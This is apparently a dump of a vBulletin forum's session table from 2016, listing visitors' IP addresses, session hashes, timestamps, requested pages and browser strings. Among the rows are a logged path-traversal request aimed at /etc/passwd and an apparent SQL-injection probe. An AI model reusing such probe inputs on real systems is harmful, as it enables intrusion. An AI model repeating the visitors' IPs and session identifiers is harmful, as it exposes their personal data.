('5ed57ee8477c7e7433187aa1e5b28729', 0, '207.46.13.21', '5e207e311e22cdc3b2095126a922fa93', 1467819780, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1e85b2a1dac134227b8dbcde5a896c9d', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467822685, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('67dc5bf9b901087348e6bdc981c5b659', 0, '108.31.197.221', 'e37abe051d5023c72e40f4839f89a332', 1467838751, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4d18733a7ad20ee14c8ec3da702d8e16', 0, '78.163.202.67', '347e105940aa85db51d7729c6c8d4ad4', 1467840284, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('60a95f5009553db7ae41bd4a0b3c97bd', 0, '23.92.123.112', '41fa6663469a72094c219281da430783', 1467858582, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('473bf40b4204cd7398c3db60cf2284a3', 0, '213.64.221.251', 'e1d0b017b4e747fa67db2572ee24f25f', 1468729404, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c5cb6f1b710bde4ea6d50528fe8172c8', 0, '172.68.34.56', '8c2a58ed4130be298d50116da95b8cf5', 1467863001, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0622002780b44019fbfe8e10ffb7aef2', 0, '104.168.151.208', '9a388e1bdd0abeacc27aa8f3b2781055', 1467864688, '/search.php?do=getnew', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9ed49f92117014040623e4a167325c78', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467865738, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e70fa27d138e6f94a70f305d9165c128', 0, '2604:2000:b9c6:', 'e754fe2fec67a587732db4576507cd91', 1467869008, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8da52fbe29772fbd8dc40e182249cc3', 0, '172.68.34.56', 'a938925ca9403f145c82d10ebc1ecbe1', 1467872717, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('637dcd996f83e356667413fdcab64c55', 0, '172.68.10.249', '4c152b6dbd5cbe2225f7d41fec5da406', 1467891112, '/showthread.php?p=2696\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('153cf9f049920716b5678a5afd8440dd', 0, '213.57.83.210', '1bd362bb55b70cd7378ec9a2123eb970', 1467894349, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a388cae9fe8362acbe5b9b65dc2cae44', 0, '172.68.10.243', '52c92d11e777a135037386b644f412dd', 1467897146, '/login.php?do=login&do=login', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('93b3b84c274211a62e0f7b7991f62ec4', 0, '104.160.5.14', '5798648ce26b04dd5db1aff36099e90d', 1467898989, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4a30ed3b2d4517796a704f89102efda', 0, '172.68.34.90', '8c2a58ed4130be298d50116da95b8cf5', 1469481720, '/archive/index.php/f-38.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('bcda56f6f071fdeb6085f7d62bb563ae', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467915929, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d999e599f1be7c5a336aa83037839e79', 0, '157.55.39.23', '23f3103f44bc3badcba53554e5e4cb6d', 1471787272, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b885a0e0f1dc86eb9aec80f2948f5811', 0, '84.246.231.3', '9d442a869f9a75e9eb03455f556ac2e2', 1467919775, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b59e1fee3db570a0701f777172c31208', 0, '172.68.10.253', 'ad24210eec1aa971581fc7185c1c3b23', 1467929509, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2600.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ec9b956befafb8142b269857bafb4991', 164, '172.68.11.238', 'f0574b40eccbcc2c1cf786bc5d220881', 1467938046, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('10dfb119b5a363ee3b15799a0321a7bc', 0, '104.160.11.144', 'f9a4617dc77890cfbeecad0e50d69fa5', 1467946274, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('042139cd75be1d3e2e11b36f20c6eb1f', 0, '86.164.145.191', '3a3890d370d2a812cf6092e5e9fe51c4', 1467956273, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4cfd7acbc76acf9f410f7a908d3c1eb0', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467958697, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f82955ac701126c6a5dbcf1ba1758364', 0, '207.46.13.14', '5e207e311e22cdc3b2095126a922fa93', 1467961647, '/memberlist.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4d5dd5858b754edfe43529d13544effa', 0, '194.179.40.4', '03eeb1b6e008e5a47735ef0279c29672', 1467971709, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7498c9730edcc7d73b992bcb0acf7850', 0, '173.245.211.108', '98dfe2be40fe4a433fe0dba3b75ae2bc', 1467973367, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8ddfc68b20ee0471b77c87862f60480', 0, '172.68.11.204', '262c5d555faebac1f69818e0ad78e865', 1467984994, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('03c82609e8818b7b22aa1f6f0d981cc1', 0, '82.37.4.111', '703d4389707f5a2462763c461dc79b2d', 1467986300, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1ec0f850ac185b8131be71e909bfd848', 0, '172.68.10.197', '97869f349f2fde61bb03481eb78c4fba', 1467990983, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd4308ccb4b86cd3027ef88660aece6f', 0, '81.171.81.81', '94d92a4fdb739f388a563258099e5fcb', 1467993233, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b226269c1b7838e81d425ab246656d6f', 0, '40.77.167.73', 'c5490a5a8e1813ac25cf9e19091dcb85', 1470861736, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('220fe000cab34ee19ae032ec9a500a01', 0, '217.115.10.131', 'ea6ed4346914fe5637dd44725a11a75e', 1467994515, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3525db92e7d33e8083aeec0841e08015', 0, '100.43.91.8', '93ab97da9dc26f9bfa5e70cf3f4ccafc', 1475337628, '/showthread.php?p=2884', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a567fdf0b1c8b24ca3ba4b18b0865051', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468001904, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6beca5c396b92ff7451af08802f936b2', 0, '93.228.156.253', 'caea31a3f569febf010673002133d848', 1470923726, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9d70bcbf16f173d8a317b556562e5e27', 0, '66.249.75.57', '37a60411c341250cf0113f4eba911963', 1470360132, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('485a55be1b228842399244cc4d4ffcc8', 0, '157.55.39.230', '23f3103f44bc3badcba53554e5e4cb6d', 1474758844, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('774341c5f1299c06ca7c1c049575d020', 0, '157.55.39.143', '23f3103f44bc3badcba53554e5e4cb6d', 1468095961, '/misc.php?do=bbcode', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('043d33d387ef3ef53b33cf6824e28793', 0, '40.77.167.87', 'c5490a5a8e1813ac25cf9e19091dcb85', 1468021390, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('567140c03daa29861e2a05f33fe44c98', 0, '207.46.13.130', '5e207e311e22cdc3b2095126a922fa93', 1468039962, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('714a853de815623f6148fb0f7540fed5', 0, '66.249.65.54', '0ff4417ffc4aa97369fda8263e0a4dca', 1474998885, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('bb602c2329efe7351265d2d347f019bd', 0, '172.68.11.199', '17aac9a0362da461cfc2c18b0ae121fa', 1468035926, '/index.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b50dbe982800b59e69e99f7cfcc4773c', 0, '66.249.65.31', '0ff4417ffc4aa97369fda8263e0a4dca', 1475003167, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('711822429717878007c47ef1e9745f9a', 0, '66.249.65.35', '0ff4417ffc4aa97369fda8263e0a4dca', 1475003166, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('f1099f563963e3d47c7168dcc8a0a6b9', 0, '82.39.93.107', '28e025756055940f31b5116cdc68844e', 1468040534, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('78dc4f3717498b47f20fce6cef106650', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468044934, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('9f760cb530fd18dfa42799820c037c6d', 0, '66.249.65.53', '0ff4417ffc4aa97369fda8263e0a4dca', 1474980340, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ecf002724881bbe8431d662809ddd1f6', 0, '157.55.39.220', '23f3103f44bc3badcba53554e5e4cb6d', 1473697250, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('52b8d26ae9016a190b826f41e3433e50', 0, '66.249.65.33', '0ff4417ffc4aa97369fda8263e0a4dca', 1474969690, '/archive/index.php/t-2477.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('b1f5c1784c1da27072bd0d101dd9a96d', 0, '62.210.14.143', '524d5ad672cbab6a8019bf93b8e00b6d', 1468060919, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('17c5be54e54e2a373cffa11fce84b314', 0, '172.68.11.200', '0396263c76297a0550cbcd9b5a0c1d48', 1468067857, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ac5cc99768e4efb3b2279bf95c3c80cc', 0, '116.68.170.254', 'e944e230b7cd2836e541dd5c47fd7f84', 1468071655, '/showthread.php?t=1841', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f830267bf57d700b98853a70d4028617', 0, '2a02:181f:0:161', '3fd9c4dfe824245d4fd693932589445a', 1468223689, '/showthread.php?p=2995', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c22dd2110f0e640a1cbe2fd1fb149004', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468087838, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('0902902ebfea08a441fabddb180e0401', 0, '172.68.11.201', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471327810, '/archive/index.php/t-1699.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('8507454753c2f2c714c40ad7c5929077', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474201050, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d31675d71f30d7f82fd3b4c453456c89', 0, '164.132.161.56', 'f069ebb6a315f0439dd2baf44ddfa550', 1471946042, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('db22db5831a1e97762162936b2165b2f', 0, '212.7.208.115', 'af3d9ccd477797b91496660fc5a616ea', 1468100459, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e2a5ec55a7291dbac64b1da5a2edbbf', 0, '193.171.202.150', '19792fb9619512b666e3059bfa540f62', 1468126266, '/login.php?do=logout&logouthash=1468126263-4455b646f2195dd4804ae0df12bfd5c815d45f4d', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b50fb32a416e6660e7c32b4148b8167b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468173872, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8844412c9c3a858788388a310c062447', 0, '2a02:587:3106:3', 'bb160770c4822d9fe98d8b922ef84b94', 1468190257, '/search.php?do=getnew', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e6d0c69fc53ef692518842fba2d8fc1', 0, '92.25.195.75', 'd6c5b237b56347100a2a6de0bece20ab', 1468194716, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1a9c133a25ce3a088636e2f618af694', 0, '104.45.18.178', '57c3efc7a4c9eb4968342c8bd5662df8', 1474386134, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3bcd041d3d5aa2261ddbe8e2dcd23db0', 0, '23.101.61.176', '7857c3bb7c8cc4f0127d9ea8bcd0835c', 1468194731, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de0aa779c6470e8932446ef4fa40ddb1', 0, '104.209.188.207', '4d5fc5961eae4d540202b87b79b758cb', 1468194731, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d84b9040f2bb25d70fd34ffee9f76ef4', 0, '172.68.34.60', 'e97e7f23fa18fb92a08b631d09fb9b13', 1468194731, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d1734a7e6e4356a6c71a74e384ac40c1', 0, '85.187.169.182', '0f0a3f65fded5756717b29073aa3c5c9', 1468194739, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f6a34d8cd48667038d1c23e02d09e9da', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468216831, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('bd296ca03334cbe80615b1da073550fd', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1468219744, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('0f2c0901478bfd025a6fe20abdf833a4', 0, '172.68.34.91', 'a938925ca9403f145c82d10ebc1ecbe1', 1470296750, '/showthread.php?p=2970', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('596f1e153997ecf471735914647c51b0', 0, '89.144.170.119', '146eaecf835f35046ceb36e9b1bb7932', 1468229686, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d435cff1b823e6c4830da2d2e4bc99b', 0, '89.144.170.119', '146eaecf835f35046ceb36e9b1bb7932', 1468229678, '/forumdisplay.php?f=32', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('47e03e9ed06b06a2869c161a6388e3af', 0, '91.221.66.36', 'cee1a858fc7917840dc18674fb3d7b32', 1468233682, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('449ee7e322c2b0b4be425326db5580fb', 0, '157.55.39.199', '23f3103f44bc3badcba53554e5e4cb6d', 1468240785, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bed250a776d67577c63d83e96d923fd3', 0, '207.46.13.4', '5e207e311e22cdc3b2095126a922fa93', 1468259985, '/archive/index.php?pda=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('16d58a51f4b09294e143685b5b27309b', 0, '207.46.13.19', '5e207e311e22cdc3b2095126a922fa93', 1468240995, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('81bb739b3e8fd125cbc046e7eeac2cc1', 0, '178.63.97.34', '03a3e9ce91168dede92628a2ce628e0d', 1468246833, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13141094716d3abbb46742ec25ce6c9c', 0, '93.178.204.234', '0b084f7b4cdc15afc48c58ac385a1a97', 1468247565, '/showthread.php?t=1841', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('22eb4837b09084eed7ad9720779567f5', 0, '158.58.170.186', '6c6b3c27297dff68edbe96e73f5f6728', 1468247688, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27dfca399a9aeda1e4a8418e1ab94d97', 0, '182.191.181.45', '743bbeaba0281324d9dc54c1174130be', 1468258105, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d94af8b997820b99af7bff1352cf7c99', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468259711, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('73ecf66561e6e101e5defb8f6ce44af3', 0, '207.46.13.120', '5e207e311e22cdc3b2095126a922fa93', 1469462868, '/register.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('17a8ba93f8b506b75098485d4b818931', 0, '157.55.39.106', '23f3103f44bc3badcba53554e5e4cb6d', 1474084690, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0ed03f897f7d2fa836090d14a35ea04f', 0, '212.117.181.107', 'ea9e4f2fb49a5d7641419381043bc5c7', 1468261329, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2793.0 Safari/537.36', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('75551c4b3e3f4162464a655fddb5a5fc', 0, '2a02:598:2::161', '5aefdc2ae905e15097bb77daf8b2d1b0', 1468265706, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c370db42ea886a5b50e926b855ffe365', 0, '172.68.10.253', '01f3fcd15a00338bff2ddcfab883de37', 1468266165, '/showthread.php?p=3046', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c14b4c928e1f3e26bd3e7c12a38bd90d', 0, '148.251.22.173', '1caa9c1d6f71e1cba1dad7b80884bf7f', 1472593617, '/index.php', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5c659b8ca666f644fc7699ea52942e1a', 0, '23.254.211.232', '8fa0fa952130e42619d84a50b8e3a57e', 1468268962, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5f61fb7de34117037aa669722d0e0772', 0, '172.68.10.238', 'be1a49436d42b0ea0b08627013cfd7f4', 1468286243, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b3330fb34c01be2169cfff8bf3c060d7', 0, '2605:e000:141b:', '4efa1fd7e84c5d6006d6457872ad4c3a', 1468295345, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f56a6e9c5c830aaaa23e96c17723fbde', 0, '66.249.65.54', '2b2ff7461e581eb89ef4dc9afe8de380', 1468302437, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f92141262785b77dd3bc30668e1362a7', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468302767, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
